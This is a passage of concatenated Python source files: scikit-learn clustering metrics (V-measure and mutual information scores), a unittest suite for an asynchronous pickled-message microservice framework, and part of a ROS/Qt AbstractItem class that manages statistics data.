This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Read more in the :ref:`User Guide <homogeneity_completeness>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
ground truth class labels to be used as a reference
labels_pred : array, shape = [n_samples]
cluster labels to evaluate
max_n_classes: int, optional (default=5000)
Maximal number of classes handled by the adjusted_rand_score
metric. Setting it too high can lead to MemoryError or OS
freeze
Returns
-------
v_measure: float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
References
----------
.. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
conditional entropy-based external cluster evaluation measure
<http://aclweb.org/anthology/D/D07/D07-1043.pdf>`_
See also
--------
homogeneity_score
completeness_score
Examples
--------
Perfect labelings are both homogeneous and complete, hence have score 1.0::
>>> from sklearn.metrics.cluster import v_measure_score
>>> v_measure_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> v_measure_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
Labelings that assign all classes members to the same clusters
are complete be not homogeneous, hence penalized::
>>> print("%.6f" % v_measure_score([0, 0, 1, 2], [0, 0, 1, 1]))
... # doctest: +ELLIPSIS
0.8...
>>> print("%.6f" % v_measure_score([0, 1, 2, 3], [0, 0, 1, 1]))
... # doctest: +ELLIPSIS
0.66...
Labelings that have pure clusters with members coming from the same
classes are homogeneous but un-necessary splits harms completeness
and thus penalize V-measure as well::
>>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 0, 1, 2]))
... # doctest: +ELLIPSIS
0.8...
>>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 1, 2, 3]))
... # doctest: +ELLIPSIS
0.66...
If classes members are completely split across different clusters,
the assignment is totally incomplete, hence the V-Measure is null::
>>> print("%.6f" % v_measure_score([0, 0, 0, 0], [0, 1, 2, 3]))
... # doctest: +ELLIPSIS
0.0...
Clusters that include samples from totally different classes totally
destroy the homogeneity of the labeling, hence::
>>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 0, 0, 0]))
... # doctest: +ELLIPSIS
0.0...
"""
return homogeneity_completeness_v_measure(labels_true, labels_pred,
max_n_classes)[2]
def mutual_info_score(labels_true, labels_pred, contingency=None,
max_n_classes=5000):
"""Mutual Information between two clusterings
The Mutual Information is a measure of the similarity between two labels of
the same data. Where :math:`P(i)` is the probability of a random sample
occurring in cluster :math:`U_i` and :math:`P'(j)` is the probability of a
random sample occurring in cluster :math:`V_j`, the Mutual Information
between clusterings :math:`U` and :math:`V` is given as:
.. math::
MI(U,V)=\sum_{i=1}^R \sum_{j=1}^C P(i,j)\log\\frac{P(i,j)}{P(i)P'(j)}
This is equal to the Kullback-Leibler divergence of the joint distribution
with the product distribution of the marginals.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Read more in the :ref:`User Guide <mutual_info_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
A clustering of the data into disjoint subsets.
labels_pred : array, shape = [n_samples]
A clustering of the data into disjoint subsets.
contingency: None or array, shape = [n_classes_true, n_classes_pred]
A contingency matrix given by the :func:`contingency_matrix` function.
If value is ``None``, it will be computed, otherwise the given value is
used, with ``labels_true`` and ``labels_pred`` ignored.
max_n_classes: int, optional (default=5000)
Maximal number of classes handled by the mutual_info_score
metric. Setting it too high can lead to MemoryError or OS
freeze
Returns
-------
mi: float
Mutual information, a non-negative value
See also
--------
adjusted_mutual_info_score: Adjusted against chance Mutual Information
normalized_mutual_info_score: Normalized Mutual Information
"""
if contingency is None:
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
contingency = contingency_matrix(labels_true, labels_pred,
max_n_classes=max_n_classes)
contingency = np.array(contingency, dtype='float')
contingency_sum = np.sum(contingency)
pi = np.sum(contingency, axis=1)
pj = np.sum(contingency, axis=0)
outer = np.outer(pi, pj)
nnz = contingency != 0.0
# normalized contingency
contingency_nm = contingency[nnz]
log_contingency_nm = np.log(contingency_nm)
contingency_nm /= contingency_sum
# log(a / b) should be calculated as log(a) - log(b) for
# possible loss of precision
log_outer = -np.log(outer[nnz]) + log(pi.sum()) + log(pj.sum())
mi = (contingency_nm * (log_contingency_nm - log(contingency_sum))
+ contingency_nm * log_outer)
return mi.sum()
def adjusted_mutual_info_score(labels_true, labels_pred, max_n_classes=5000):
"""Adjusted Mutual Information between two clusterings
Adjusted Mutual Information (AMI) is an adjustment of the Mutual
Information (MI) score to account for chance. It accounts for the fact that
the MI is generally higher for two clusterings with a larger number of
clusters, regardless of whether there is actually more information shared.
For two clusterings :math:`U` and :math:`V`, the AMI is given as::
AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [max(H(U), H(V)) - E(MI(U, V))]
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Be mindful that this function is an order of magnitude slower than other
metrics, such as the Adjusted Rand Index.
Read more in the :ref:`User Guide <mutual_info_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
A clustering of the data into disjoint subsets.
labels_pred : array, shape = [n_samples]
A clustering of the data into disjoint subsets.
max_n_classes: int, optional (default=5000)
Maximal number of classes handled by the adjusted_rand_score
metric. Setting it too high can lead to MemoryError or OS
freeze
Returns
-------
ami: float(upperlimited by 1.0)
The AMI returns a value of 1 when the two partitions are identical
(ie perfectly matched). Random partitions (independent labellings) have
an expected AMI around 0 on average hence can be negative.
See also
--------
adjusted_rand_score: Adjusted Rand Index
mutual_information_score: Mutual Information (not adjusted for chance)
Examples
--------
Perfect labelings are both homogeneous and complete, hence have
score 1.0::
>>> from sklearn.metrics.cluster import adjusted_mutual_info_score
>>> adjusted_mutual_info_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> adjusted_mutual_info_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
If classes members are completely split across different clusters,
the assignment is totally in-complete, hence the AMI is null::
>>> adjusted_mutual_info_score([0, 0, 0, 0], [0, 1, 2, 3])
0.0
References
----------
.. [1] `Vinh, Epps, and Bailey, (2010). Information Theoretic Measures for
Clusterings Comparison: Variants, Properties, Normalization and
Correction for Chance, JMLR
<http://jmlr.csail.mit.edu/papers/volume11/vinh10a/vinh10a.pdf>`_
.. [2] `Wikipedia entry for the Adjusted Mutual Information
<http://en.wikipedia.org/wiki/Adjusted_Mutual_Information>`_
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
n_samples = labels_true.shape[0]
classes = np.unique(labels_true)
clusters = np.unique(labels_pred)
# Special limit cases: no clustering since the data is not split.
# This is a perfect match hence return 1.0.
if (classes.shape[0] == clusters.shape[0] == 1
or classes.shape[0] == clusters.shape[0] == 0):
return 1.0
contingency = contingency_matrix(labels_true, labels_pred,
max_n_classes=max_n_classes)
contingency = np.array(contingency, dtype='float')
# Calculate the MI for the two clusterings
mi = mutual_info_score(labels_true, labels_pred,
contingency=contingency)
# Calculate the expected value for the mutual information
emi = expected_mutual_information(contingency, n_samples)
# Calculate entropy for each labeling
h_true, h_pred = entropy(labels_true), entropy(labels_pred)
ami = (mi - emi) / (max(h_true, h_pred) - emi)
return ami
def normalized_mutual_info_score(labels_true, labels_pred, max_n_classes=5000):
"""Normalized Mutual Information between two clusterings
Normalized Mutual Information (NMI) is an normalization of the Mutual
Information (MI) score to scale the results between 0 (no mutual
information) and 1 (perfect correlation). In this function, mutual
information is normalized by ``sqrt(H(labels_true) * H(labels_pred))``
This measure is not adjusted for chance. Therefore
:func:`adjusted_mustual_info_score` might be preferred.
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Read more in the :ref:`User Guide <mutual_info_score>`.
Parameters
----------
labels_true : int array, shape = [n_samples]
A clustering of the data into disjoint subsets.
labels_pred : array, shape = [n_samples]
A clustering of the data into disjoint subsets.
max_n_classes: int, optional (default=5000)
Maximal number of classes handled by the adjusted_rand_score
metric. Setting it too high can lead to MemoryError or OS
freeze
Returns
-------
nmi: float
score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling
See also
--------
adjusted_rand_score: Adjusted Rand Index
adjusted_mutual_info_score: Adjusted Mutual Information (adjusted
against chance)
Examples
--------
Perfect labelings are both homogeneous and complete, hence have
score 1.0::
>>> from sklearn.metrics.cluster import normalized_mutual_info_score
>>> normalized_mutual_info_score([0, 0, 1, 1], [0, 0, 1, 1])
1.0
>>> normalized_mutual_info_score([0, 0, 1, 1], [1, 1, 0, 0])
1.0
If classes members are completely split across different clusters,
the assignment is totally in-complete, hence the NMI is null::
>>> normalized_mutual_info_score([0, 0, 0, 0], [0, 1, 2, 3])
0.0
"""
labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
classes = np.unique(labels_true)
clusters = np.unique(labels_pred)
# Special limit cases: no clustering since the data is not split.
# This is a perfect match hence return 1.0.
if (classes.shape[0] == clusters.shape[0] == 1
or classes.shape[0] == clusters.shape[0] == 0):
return 1.0
contingency = contingency_matrix(labels_true, labels_pred,
max_n_classes=max_n_classes)
contingency = np.array(contingency, dtype='float')
# Calculate the MI for the two clusterings
mi = mutual_info_score(labels_true, labels_pred,
contingency=contingency)
# Calculate the expected value for the mutual information
# Calculate entropy for each labeling
h_true, h_pred = entropy(labels_true), entropy(labels_pred)
nmi = mi / max(np.sqrt(h_true * h_pred), 1e-10)
return nmi
def entropy(labels):
"""Calculates the entropy for a labeling."""
if len(labels) == 0:
return 1.0
label_idx = np.unique(labels, return_inverse=True)[1]
pi = bincount(label_idx).astype(np.float)
pi = pi[pi > 0]
pi_sum = np.sum(pi)
# log(a / b) should be calculated as log(a) - log(b) for
# possible loss of precision
return -np.sum((pi / pi_sum) * (np.log(pi) - log(pi_sum)))
| |
import pickle
import time
from microservice.tests.microservice_test_case import MicroserviceTestCase
from unittest.mock import call
from microservice.core import settings, communication
from microservice.tests import microservices_for_testing
class TestAsynchronousLocalService(MicroserviceTestCase):
# Timer to allow the async threads to complete before we check their results.
# It would be better to actually wait for the threads to complete, but this is far simpler.
THREAD_TIMER = 0.1
@classmethod
def setUpClass(cls):
super(TestAsynchronousLocalService, cls).setUpClass()
settings.communication_mode = settings.CommunicationMode.ACTOR
settings.deployment_mode = settings.DeploymentMode.KUBERNETES
settings.local_uri = None
cls.args = (1, 2, 3)
cls.kwargs = {'a': 'asdf', 'b': 123}
def test_request(self):
"""
Test that:
- A 200 response is received to making a request to a microservice
- A separate request is made back to the calling service with the result.
"""
local_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
self.mock_setup(local_service_name)
orig_msg = communication.Message()
orig_msg.add_result('other_service_name', (), {}, [1, 3, 5, 7])
test_msg = communication.construct_message_add_via(
orig_msg,
*self.args,
**self.kwargs,
)
response = self.app.get(
'/',
data=test_msg.pickle,
content_type='application/json')
result = pickle.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(result, True)
# Wait for the thread pool to complete the work.
time.sleep(self.THREAD_TIMER)
expected_message = communication.Message()
expected_message.add_result('other_service_name', (), {}, [1, 3, 5, 7])
expected_message.add_result(local_service_name, self.args, self.kwargs, {
'_args': tuple(self.args),
**self.kwargs
})
self.mocked_send_object_to_service.assert_has_calls([
call(local_service_name,
expected_message),
])
def test_request_resulting_in_exception(self):
"""
Test that:
- A 200 response is received to making a request to a microservice
- A separate request is made back to the calling service with the result, which is an exception
"""
local_service_name = 'microservice.tests.microservices_for_testing.exception_raiser'
self.mock_setup(local_service_name)
test_msg = communication.construct_message_add_via(
communication.Message(),
*self.args,
**self.kwargs,
)
response = self.app.get(
'/',
data=test_msg.pickle,
content_type='application/json')
result = pickle.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(result, True)
# Wait for the thread pool to complete the work.
time.sleep(self.THREAD_TIMER)
# Python in-built comparison for exceptions doesn't work for different instances, so
# have to compare the arguments directly.
self.mocked_send_object_to_service.assert_called_once()
# Check the service name is as expected
self.assertEqual(local_service_name,
self.mocked_send_object_to_service.mock_calls[0][1][0])
# Check that the details of the exception are as expected
expected = RuntimeError("Called with: {}; {}".format(self.args, self.kwargs))
result_message = self.mocked_send_object_to_service.mock_calls[0][1][1]
actual = result_message.get_result(local_service_name, self.args, self.kwargs)
self.assertEqual(type(expected), type(actual))
self.assertEqual(expected.args, actual.args)
def test_request_with_originating_args(self):
"""
Test that:
- The call back to the originating microservice contains the args and kwargs that that microservice was
originally called with
"""
local_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
self.mock_setup(local_service_name)
previous_service_args = [1, 2, 6]
previous_service_kwargs = {
3: 6,
'asdf': 'wryt'
}
test_msg = communication.construct_message_add_via(
communication.Message(
args=previous_service_args,
kwargs=previous_service_kwargs,
),
*self.args,
**self.kwargs,
)
response = self.app.get(
'/',
data=test_msg.pickle,
content_type='application/json')
result = pickle.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(result, True)
# Wait for the thread pool to complete the work.
time.sleep(self.THREAD_TIMER)
expected_message = communication.Message.from_dict({
'args': previous_service_args,
'kwargs': previous_service_kwargs,
})
expected_message.add_result(local_service_name, self.args, self.kwargs, {
'_args': tuple(self.args),
**self.kwargs
})
self.mocked_send_object_to_service.assert_has_calls([
call(local_service_name,
expected_message),
])
def test_nested_request(self):
nested_service_name = "microservice.tests.microservices_for_testing.echo_as_dict"
local_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict2'
self.mock_setup(local_service_name)
previous_service_args = (1, 2, 6)
previous_service_kwargs = {
3: 6,
'asdf': 'wryt'
}
test_msg = communication.construct_message_add_via(
communication.Message(
args=previous_service_args,
kwargs=previous_service_kwargs,
),
*self.args,
**self.kwargs,
)
response = self.app.get(
'/',
data=test_msg.pickle,
content_type='application/json')
result = pickle.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(result, True)
# Wait for the thread pool to complete the work.
time.sleep(self.THREAD_TIMER)
expected_message = communication.Message.from_dict({
'args': (5, 2, 5),
'kwargs': {'asdf': 'asdrf'},
'via': [
(local_service_name,
previous_service_args,
previous_service_kwargs),
('microservice.tests.microservices_for_testing.echo_as_dict2',
self.args,
self.kwargs)
],
})
self.mocked_send_object_to_service.assert_has_calls([
call(nested_service_name,
expected_message),
])
def test_nested_call_is_not_made_if_already_calculated(self):
"""
The nested service result should be stored in the `results` dict of the call back to the original
actor, and that should be used to save calling into the nested service again.
"""
local_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict2'
self.mock_setup(local_service_name)
previous_service_args = [1, 2, 6]
previous_service_kwargs = {
3: 6,
'asdf': 'wryt'
}
echo_as_dict_expected_result = {
'_args': microservices_for_testing.echo_as_dict2_args,
**microservices_for_testing.echo_as_dict2_kwargs
}
test_msg = communication.construct_message_add_via(
communication.Message(
args=previous_service_args,
kwargs=previous_service_kwargs,
),
*self.args,
**self.kwargs,
)
test_msg.add_result('microservice.tests.microservices_for_testing.echo_as_dict',
microservices_for_testing.echo_as_dict2_args,
microservices_for_testing.echo_as_dict2_kwargs,
echo_as_dict_expected_result)
response = self.app.get(
'/',
data=test_msg.pickle,
content_type='application/json')
result = pickle.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(result, True)
# Wait for the thread pool to complete the work.
time.sleep(self.THREAD_TIMER)
expected_message = communication.Message.from_dict({
'args': previous_service_args,
'kwargs': previous_service_kwargs,
})
expected_message.add_result('microservice.tests.microservices_for_testing.echo_as_dict',
microservices_for_testing.echo_as_dict2_args,
microservices_for_testing.echo_as_dict2_kwargs,
echo_as_dict_expected_result)
expected_message.add_result('microservice.tests.microservices_for_testing.echo_as_dict2',
self.args,
self.kwargs,
(
{
'_args': self.args,
**self.kwargs
},
echo_as_dict_expected_result,
))
self.mocked_send_object_to_service.assert_has_calls([
call(local_service_name,
expected_message),
])
def test_interface_request(self):
"""
Test that calling into a decorated function with only args/kwargs results in a call to the relevant
microservice.
"""
self.mock_setup('my_app', interface=True)
args = (3, 4, 5)
kwargs = {'erty': 5, 'asdf': 'asddfg'}
expected_result = ("nonsense", 35)
target_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
result_key = communication.create_result_key(target_service_name, args, kwargs)
# Make the result for this request available to pretend that it's been carried out successfully.
settings.set_interface_result(self.request_id, expected_result)
result = microservices_for_testing.echo_as_dict(*args, **kwargs)
# Make sure that we've flagged this request ID as being made
self.assertIn(self.request_id, settings.interface_requests.keys())
self.assertEqual(result_key, settings.interface_requests[self.request_id])
self.assertEqual(result, expected_result)
self.mocked_send_object_to_service.assert_has_calls([
call(target_service_name,
communication.Message.from_dict({
'args': args,
'kwargs': kwargs,
'via': [('my_app', (), {})],
'request_id': self.request_id,
})),
])
def test_interface_response(self):
"""
This test covers the handling of a response to a request made from an interface.
It relies on the results being handled (and cached) separately to the request being made. It does:
- Set up the local microservice handler in interface mode.
- Send the response to this local handler (flask app)
- Ensure that response is stored correctly
- Make a request that would wait for that response, but finishes immediately because it's already available.
The reason for doing this back to front (response, then request) is to avoid complicating the test with
threading (as the request blocks until the response is received).
"""
self.mock_setup('my_app', interface=True)
args = (3, 4, 5)
kwargs = {'erty': 5, 'asdf': 'asddfg'}
expected_result = ("nonsense", 35)
target_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
result_key = communication.create_result_key(target_service_name, args, kwargs)
# State that we're expecting a response for a request matching self.request_id
settings.set_interface_request(self.request_id, result_key)
# Construct the message that we'd expect to see back in response
response_message = communication.Message(
request_id=self.request_id,
)
response_message.add_result(target_service_name, args, kwargs, expected_result)
# Send the response - the answer should get placed in the response storage.
response = self.app.get(
'/',
data=response_message.pickle,
content_type='application/json')
response_result = pickle.loads(response.data)
self.assertEqual(response_result, True)
# Wait for the thread pool to complete the work.
time.sleep(self.THREAD_TIMER)
# Check that the result has been logged
self.assertIn(self.request_id, settings.interface_results.keys())
self.assertEqual(expected_result, settings.interface_results[self.request_id])
# Make the request that this corresponds to, to check that the result is picked up correctly.
result = microservices_for_testing.echo_as_dict(*args, **kwargs)
self.assertEqual(result, expected_result)
# Remove the hanging request id to tidy up for any other tests.
# This is only required because we're doing this test in the reverse order (response, then request).
del settings.interface_requests[self.request_id]
def test_interface_response_resulting_in_exception(self):
"""
This test is identical to the test `test_interface_response`, but the response is an exception, so we expect
to see it raised instead of simply returned.
"""
self.mock_setup('my_app', interface=True)
args = (3, 4, 5)
kwargs = {'erty': 5, 'asdf': 'asddfg'}
expected_result = RuntimeError("Sample error that should get raised.")
target_service_name = 'microservice.tests.microservices_for_testing.echo_as_dict'
result_key = communication.create_result_key(target_service_name, args, kwargs)
# State that we're expecting a response for a request matching self.request_id
settings.set_interface_request(self.request_id, result_key)
# Construct the message that we'd expect to see back in response
response_message = communication.Message(
request_id=self.request_id,
)
response_message.add_result(target_service_name, args, kwargs, expected_result)
# Send the response - the answer should get placed in the response storage.
response = self.app.get(
'/',
data=response_message.pickle,
content_type='application/json')
response_result = pickle.loads(response.data)
self.assertEqual(response_result, True)
# Wait for the thread pool to complete the work.
time.sleep(self.THREAD_TIMER)
# Make the request that this corresponds to, to check that the result is picked up correctly.
with self.assertRaises(type(expected_result)):
microservices_for_testing.echo_as_dict(*args, **kwargs)
# Remove the hanging request id to tidy up for any other tests.
# This is only required because we're doing this test in the reverse order (response, then request).
del settings.interface_requests[self.request_id]
| |
from threading import Lock
import time as tm
from rospy.rostime import Duration, Time
import rospy
from python_qt_binding.QtCore import QTranslator, QObject
from helper_functions import prepare_number_for_representation, topic_statistics_state_to_string, \
ALIVE_TIMER_CALLBACK, MAXIMUM_OFFLINE_TIME, WARNING_TIMEOUT
class AbstractItem(QObject):
"""
Provides a unified interface to access the items of the model.
INTERNAL: WARNING! Whenever the key-values at the beginning are not set right, the oddest things may occur!
"""
def __init__(self, logger, seuid, parent=None):
"""
Initializes the AbstractItem.
:param seuid: the seuid of the AbstractItem
:type seuid: str
:param logger: a logger where to log when special events occur
:type logger: ModelLogger
:param parent: the parent-item
:type parent: AbstractItem
"""
super(AbstractItem, self).__init__(parent)
self._logger = logger
self._data = {}
self.counter = 0
"""
_rated_data is dict containing the rated data. state, window_start and window_end are simply lists
with the corresponding entries. Any other values typically is a list containing lists which however contain the
values. This is equivalent to the representation in the RatedStatistics/Entity.
"""
self._rated_data = {}
self._child_items = []
self.__parent = parent
self.seuid = seuid
self._type = "type"
self.__data_attribute = "data"
self.__state = []
# self.__last_update = Time.now()
self.__creation_time = Time.now()
self.marked = False
# self.markation_date = Time.now()
self._add_data_list("window_start")
self._add_data_list("window_stop")
self._add_rated_data_list("window_start")
self._add_rated_data_list("window_stop")
self._length_of_data = 0
self._length_of_rated_data = 0
self._data_lock = Lock()
self._rated_data_lock = Lock()
self._rated_attributes = []
self._rated_attributes.append("alive.actual_value")
self._rated_attributes.append("alive.expected_value")
self._rated_attributes.append("alive.state")
#self._alive_timer = rospy.Time.now()
#self.alive = True
#rospy.Timer(rospy.Duration(ALIVE_TIMER_CALLBACK), self._updateTimer)
#self._offline_time = rospy.Duration(MAXIMUM_OFFLINE_TIME)
self.is_subscriber = False
# def _updateTimer(self, event):
# """
# Updates the timer to the last changed status. If it
# :return:
# """
# #self._alive_timer = self.get_latest_data("window_stop")["window_stop"]
# if (Time.now() - self._alive_timer) > self._offline_time:
# print(self.seuid)
# print(Time.now() - self._alive_timer)
# print(self._offline_time)
# self.alive = False
# self.set_state("no recent data")
# else:
# self.alive = True
def get_type(self):
"""
Returns the type of the item
:return: the type
:rtype: str
"""
return self._type
def get_seuid(self):
"""
Returns the seuid as a string.
:returns: seuid of the item
:rtype: str
"""
return self.seuid
def add_state(self, state):
"""
Used to simply add a state to the list of states.
"""
self.__state.append(state)
def set_state(self, state):
if len(self.__state) is not 0:
self.__state[-1] = state
else:
self.__state.append(state)
def get_state(self):
"""
Returns the state as a string.
:returns: state of the item
:rtype: str
"""
if self.__state:
return self.__state[-1]
return "unknown"
def _add_data_list(self, name):
"""
Adds keys to the data_list.
:param name: the key to be added
:type name: str
"""
self._data[name] = []
def _add_rated_data_list(self, name):
"""
Adds keys to the rated_data_list.
:param name: the key to be added
:type name: str
"""
self._rated_data[name] = []
def append_child(self, child):
"""
Append a child to the list of childs.
:param child: the child item
:type child: AbstractItem
"""
self._child_items.append(child)
def _update_current_state(self):
"""
This method updates the current state of the AbstractItem.
:raises TypeError: at the initialization, it's possible that last_states["state"] has no entries and a TypeError occures
"""
if self.get_state():
if self.get_state() is not "error":
last_states = self.get_rated_items_younger_than(Time.now() - (
Duration(secs=WARNING_TIMEOUT) if int(Duration(secs=5).to_sec()) <= int(Time.now().to_sec()) else Time(0)),
"state")
try:
for i in range(0, len(last_states["state"])):
if last_states["state"][i] is "error":
self.set_state("warning")
break
except TypeError:
return
def append_data(self, message):
"""
Appends data to the data of the AbstractItem.
:param message: the message to append
:type message: one of the different message types TopicStatistics, HostStatistics or NodeStatistics
:raises KeyError: if an entry is in the rated dictionary but not found in the message
"""
self._data_lock.acquire()
#self._alive_timer = rospy.Time.now()
for attribute in self._data:
try:
if attribute is "frequency":
self._data[attribute].append(message.delivered_msgs / (message.window_stop - message.window_start).to_sec())
elif attribute is "bandwidth":
self._data[attribute].append(message.traffic / (message.window_stop - message.window_start).to_sec())
else:
self._data[attribute].append(getattr(message, attribute))
except KeyError:
print("KeyError occurred when trying to access %s", attribute)
raise
self._length_of_data += 1
self._data_lock.release()
def update_rated_data(self, data):
"""
Appends data to the rated_data of the AbstractItem.
:param data: the data to append in key value form
:type data: RatedStatistics
:raises KeyError: if an entry is in the rated dictionary but not found in the message
"""
self._rated_data_lock.acquire()
self._rated_data["window_start"].append(data.window_start)
self._rated_data["window_stop"].append(data.window_stop)
last_state = self.get_state()
new_state = "unknown"
for element in data.rated_statistics_entity:
self._rated_data[element.statistic_type + ".actual_value"].append(element.actual_value)
self._rated_data[element.statistic_type + ".expected_value"].append(element.expected_value)
for i in range(0, len(element.state)):
state = topic_statistics_state_to_string(element, element.state[i])
self._rated_data[element.statistic_type + ".state"].append(state)
if (state is "low" or state is "high") and state is not "ok" and state is not "unkown":
new_state = "error"
elif state is "ok" and new_state is not "error":
new_state = "ok"
self.add_state(new_state)
self._update_current_state()
if new_state is "error" and last_state is not "error":
self._logger.log("error", Time.now(), self.seuid, self.get_erroneous_entries_for_log())
self._rated_data_lock.release()
def child_count(self, parent=None):
"""
Returns the number of children from the AbstractItem.
:returns: number of childs
:rtype: int
"""
return len(self._child_items)
def column_count(self):
"""
Returns the number of columns.
:returns: the number of columns
:rtype: int
"""
return 4
def get_childs(self, parent=None):
"""
Returns a list with all children.
:returns: list of children
:rtype: list
"""
return self._child_items
def get_child(self, row, parent=None):
"""
Returns the child at the position row.
:param row: the index of the row
:type row: int
:returns: the child at the position row
:rtype: AbstractItem
"""
return self._child_items[row]
def row(self, parent=None):
"""
Returns the index of the Item.
:returns: the index of the Item
:rtype: int
"""
if self.__parent:
return self.__parent.get_childs().index(self)
return 0
def get_amount_of_entries(self):
"""
Returns the amount of entries in the data part of the item
:return: amount of entries
:rtype: int
"""
return self._length_of_data
def get_latest_data(self, *args):
"""
Returns the latest dict of the data_list or the item of the dict with the given key.
:param kwargs: the keys to the dict
:type kwargs: str
:returns: dict of the item
:rtype: dict
:raises KeyError: if an element in args cannot be found in any of the dictionaries (data vs rated data) or attributes (namely name, type, data and state)
"""
self._data_lock.acquire()
return_dict = {}
if args:
for key in args:
if key is 'name':
return_dict['name'] = self.seuid
elif key is 'type':
return_dict['type'] = self._type
# elif key is 'data':
# return_dict['data'] = self.get_short_data()
elif key is 'state':
if len(self.__state) is not 0:
return_dict['state'] = self.get_state()
else:
return_dict["state"] = "unknown"
else:
if key in self._data:
if self._data[key]:
return_dict[key] = self._data[key][-1]
else:
if key == 'window_stop':
return_dict[key] = Time(0)
elif key in self.get_list_items():
return_dict[key] = [self.tr("Currently no value available")]
else:
return_dict[key] = self.tr("Currently no value available")
elif key in self._rated_data:
if self._rated_data[key]:
return_dict[key] = self._rated_data[key][-1]
else:
return_dict[key] = self.tr("Currently no value available")
# raise KeyError("item " + key + "was not found")
else:
return_dict['name'] = self.seuid
return_dict['type'] = self._type
# return_dict['data'] = self.get_short_data()
for entry in self._data:
if self._data[entry]:
return_dict[entry] = self._data[entry][-1]
else:
if entry == 'window_stop':
return_dict[entry] = Time(0)
elif entry in self.get_list_items():
return_dict[entry] = [self.tr("Currently no value available")]
else:
return_dict[entry] = self.tr("Currently no value available")
for entry in self._rated_data:
if entry == 'window_start' or entry == 'window_stop':
continue
if self._rated_data[entry]:
return_dict[entry] = self._rated_data[entry][-1]
else:
return_dict[entry] = self.tr("Currently no value available")
if len(self.__state) is not 0:
return_dict['state'] = self.get_state()
else:
return_dict['state'] = "unknown"
self._data_lock.release()
return return_dict
def parent(self):
"""
Returns the parent of this or None if there is no parent.
:returns: parent
:rtype: AbstractItem
"""
return self.__parent
def get_items_older_than(self, time):
"""
Returns all items which are older than time.
Warning: Method assumes data is sorted by time if this is not true will return too few or too much data.
WARNING: This method is only thread-safe if used via delete_items_older_than() otherwise the
method may result in undetermined behaviour.
:param time: the upper bound in seconds
:type time: rospy.Time
:returns: dict of lists with the data
:rtype: dict
"""
return_values = {}
breakpoint = 0
list_of_time = self._data["window_stop"]
return_values["window_stop"] = []
length = len(list_of_time)
if length is not 0:
if list_of_time[-1] < time:
for key in return_values:
return_values[key] = self._data[key]
else:
i = length - 1
while i > 0 and list_of_time[i] > time:
i -= 1
breakpoint = i
for key in self._data:
return_values[key] = self._data[key][0:breakpoint]
# todo: currently this is not right for rated data... FIX!!! --> probably move this to another function!
return_values["state"] = self.__state[breakpoint:length]
# self._data_lock.release()
return return_values
def delete_items_older_than(self, time):
"""
Deletes all items which are older than time.
:param time: the upper bound
:type time: rospy.Time
"""
self._data_lock.acquire()
self._rated_data_lock.acquire()
list_of_time = self._data["window_stop"]
if len(list_of_time) is not 0:
i = 0
entries_to_delete = self.get_items_older_than(time)
i += len(entries_to_delete["window_stop"])
for j in range(0, len(entries_to_delete["window_stop"])):
for value in self._data.values():
del value[0]
self._length_of_data -= i
self.delete_rated_items_older_than(time)
self._rated_data_lock.release()
self._data_lock.release()
def get_rated_items_older_than(self, time):
"""
Returns all items which are older than time.
Warning: Method assumes data is sorted by time if this is not true will return too few or too much data.
WARNING: This method is only thread-safe if used via delete_items_older_than() otherwise the
method may result in undetermined behaviour.
:param time: the upper bound in seconds
:type time: rospy.Time
:returns: dict of lists with the data
:rtype: dict
"""
return_values = {}
breakpoint = 0
list_of_time = self._rated_data["window_stop"]
return_values["window_stop"] = []
length = len(list_of_time)
if length is not 0:
if list_of_time[-1] < time:
for key in return_values:
return_values[key] = self._rated_data[key]
else:
i = length - 1
while i > 0 and list_of_time[i] > time:
i -= 1
breakpoint = i
for key in self._rated_data:
return_values[key] = self._rated_data[key][0:breakpoint]
return_values["state"] = self.__state[breakpoint:length]
return return_values
def delete_rated_items_older_than(self, time):
"""
Deletes all items which are older than time.
:param time: the upper bound
:type time: rospy.Time
:raises IndexError: Because in most cases not all values are monitored, it is possible that a reated_data_value is empty
"""
list_of_time = self._rated_data["window_stop"]
if len(list_of_time) is not 0:
i = 0
entries_to_delete = self.get_rated_items_older_than(time)
i += len(entries_to_delete["window_stop"])
